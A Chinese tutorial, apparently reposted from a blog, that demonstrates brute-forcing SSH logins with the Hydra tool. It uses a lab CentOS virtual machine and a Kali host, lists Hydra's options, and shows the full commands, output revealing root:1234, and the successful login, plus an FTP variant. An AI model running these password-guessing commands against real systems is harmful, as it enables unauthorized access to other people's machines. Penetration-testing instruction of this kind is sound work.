九头蛇--hydra爆破密码实现远程连接登录

Posted H.20

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了九头蛇--hydra爆破密码实现远程连接登录相关的知识,希望对你有一定的参考价值。

Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、mysql、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。下面演示一下hydra的简单实用。

准备环节

1台centos虚拟机:IP192.168.xx.xx 账号root 密码1234(靶机)
1台kali虚拟机 (主机)
一份爆破用字典(账户爆破字典、密码爆破字典)

参数简介

hydra的主要选项
-R 修复以前使用的aborted/crashed session服务器
-S 执行SSL(Secure Socket Layer)链接session
-s Port 使用非默认服务器端口而是其余端口时,指定其端口并发
-l Login 已经获取登陆ID的状况下输入登陆IDssh
-L FILE 未获取登陆ID状况下指定用于暴力破解的文件(须要指出全路径)工具
-p Pass 已经获取登陆密码的状况下输入登陆密码线程
-P FILE 未获取登陆密码的状况下指定用于暴力破解的文件(须要指出全路径)code
-x MIN:MAX:CHARSET 暴力破解时不指定文件,而生能够知足指定字符集和最短、最长长度条件的密码来尝试暴力破解blog
-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式进程
-M FILE指定实施并列攻击的文件服务器的目录文件
-o FILE以STDOUT的形式输出结果值
-f 查找到第一个可使用的ID和密码的时候中止破解
-t TASKS 指定并列链接数(默认值:16)
-w 指定每一个线程的回应时间(Waittime)(默认值:32秒)
-4/6 指定IPv4/IPv6(默认值:IPv4)
-v/-V 显示详细信息
-U 查看服务器组件使用明细

实现环节

ssh默认是22号端口

可以看到,我桌面这里有一个爆破密码的文本kouling.txt和一个爆破用户名的文本name.txt,第一次演示的是已知用户名,不知道密码的情况下,所以只需要调用一个密码本kouling.txt就可以 ,在11行显示login: root password: 1234(爆破速度比较快)
第二次演示的是不知道用户名和密码的情况下,调用了两个文本,在倒数第8行显示login: root password: 1234(爆破速度很慢)

┌──(root💀kali)-[~/桌面]
└─# ls
kouling.txt  name.txt
                                                                                                                           
┌──(root💀kali)-[~/桌面]
└─# hydra -l root -P kouling.txt ssh://192.168.xx.xx:22/                   255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 17:54:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx   login: root   password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 17:54:14
                                                                                                                                                                  
┌──(root💀kali)-[~/桌面]
└─# hydra -L name.txt -P kouling.txt ssh://192.168.xx.xx:22/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 18:03:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx   login: root   password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 18:03:48

 ┌──(root💀kali)-[~/桌面]
└─#                                                                                 
验证登录,可以看到由(root💀kali)变成[root@master ~]#,登录成功,登录过程中输入yes和密码就行了
┌──(root💀kali)-[~/桌面]
└─# ssh root@192.168.xx.xx
The authenticity of host '192.168.xx.xx (192.168.xx.xx)' can't be established.
ECDSA key fingerprint is SHA256:ZWvLiyQQ6RAcqo4qBrrmAlQhFEOR3psaP6NufbK8TLw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.xx.xx' (ECDSA) to the list of known hosts.
root@192.168.xx.xx's password: 
Last login: Sun Oct  3 17:41:20 2021
[root@master ~]# 

hydra还有很多参数和协议,例如破解ftp:# hydra IP ftp -l 用户名 -P 密码字典 -t 线程 。 爆破是个很费时间的事,爆破是否成功取决于你的账号密码字典强不强!

以上是关于九头蛇--hydra爆破密码实现远程连接登录的主要内容,如果未能解决你的问题,请参考以下文章

渗透测试密码暴力破解工具——九头蛇(hydra)使用详解及实战

网络安全暴力破解工具—九头蛇(hydra)使用详解及实战

九头蛇3389远程爆破

Hydra(九头蛇)工具使用

使用BP和Hydra爆破相关的而服务

[端口安全]Hydra密码爆破